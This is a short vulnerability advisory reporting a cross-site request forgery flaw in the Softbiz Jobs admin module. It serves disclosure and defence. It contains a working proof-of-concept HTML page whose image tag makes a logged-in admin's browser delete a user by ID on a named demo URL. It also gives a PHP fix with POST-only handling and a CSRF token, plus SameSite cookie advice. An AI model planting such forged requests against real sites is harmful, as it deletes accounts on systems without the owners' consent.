Softbiz Jobs suffers from a cross-site request forgery vulnerability.
fc1d87799052dcc5aa9cbfc7263e61cbbe44ee69f2b17ebd4e1e6a9015fab702
=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download https://www.softbizscripts.com/
# Script softbizscripts
# URL https://demos1.softbiz.com/scripts/seojobs/admin/
# Proof of concept
Script to delete a registered user through cross-site request forgery
...................................................................................................................
<html>
<body>
<img src=https://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
</body>
</html>
...................................................................................................................
Example-
...................................................................................................................
<html>
<body>
<img src=https://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20 />
</body>
</html>
...................................................................................................................
After execution, refresh the page and you can see that the user with id=20 has been deleted automatically.
# If you have any questions, comments, or concerns, feel free to contact me.
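
The delete action above fires on a plain GET carrying only the admin's session cookie. The following is an added example of the usual fix (POST only, plus a per-session token compared in constant time); it is not code from Softbiz Jobs or from the advisory's author, and the function names, session keys and the `$delete` callback are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: every name here is hypothetical, not taken from Softbiz Jobs.

// One random token per admin session; the delete form carries it in a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Gate for a state-changing admin action. Returns the HTTP status to send.
function handle_delete_employer(string $method, array $session, array $post, callable $delete): int
{
    if ($method !== 'POST') {
        return 405; // an <img> tag can only issue GET, so the forged request stops here
    }
    if (empty($session['admin_id'])) {
        return 401; // no authenticated admin session
    }
    $expected = $session['csrf_token'] ?? '';
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($expected) || $expected === '' || !is_string($sent)
        || !hash_equals($expected, $sent)) {
        return 403; // a cross-site form cannot read the token, so it cannot send it
    }
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 400; // id missing or not a positive integer
    }
    $delete($id);
    return 200;
}

// Real wiring (assumed): session_start(); then
// http_response_code(handle_delete_employer($_SERVER['REQUEST_METHOD'], $_SESSION, $_POST, $delete));

// Constructed demo, run with `php example.php`; no web server or database needed.
$session = ['admin_id' => 1];              // constructed logged-in admin session
$token = csrf_token($session);
$deleted = [];
$delete = function (int $id) use (&$deleted): void { $deleted[] = $id; };

echo handle_delete_employer('GET', $session, [], $delete), "\n";               // request shape from the advisory
echo handle_delete_employer('POST', $session, ['id' => '20'], $delete), "\n";  // POST without the token
echo handle_delete_employer('POST', $session, ['id' => '20', 'csrf_token' => $token], $delete), "\n"; // admin's own form
echo 'deleted ids: ', implode(',', $deleted), "\n";
```

Setting the session cookie's SameSite attribute to Lax or Strict is a complementary control, since the browser then omits the cookie on cross-site subresource requests such as the image load above.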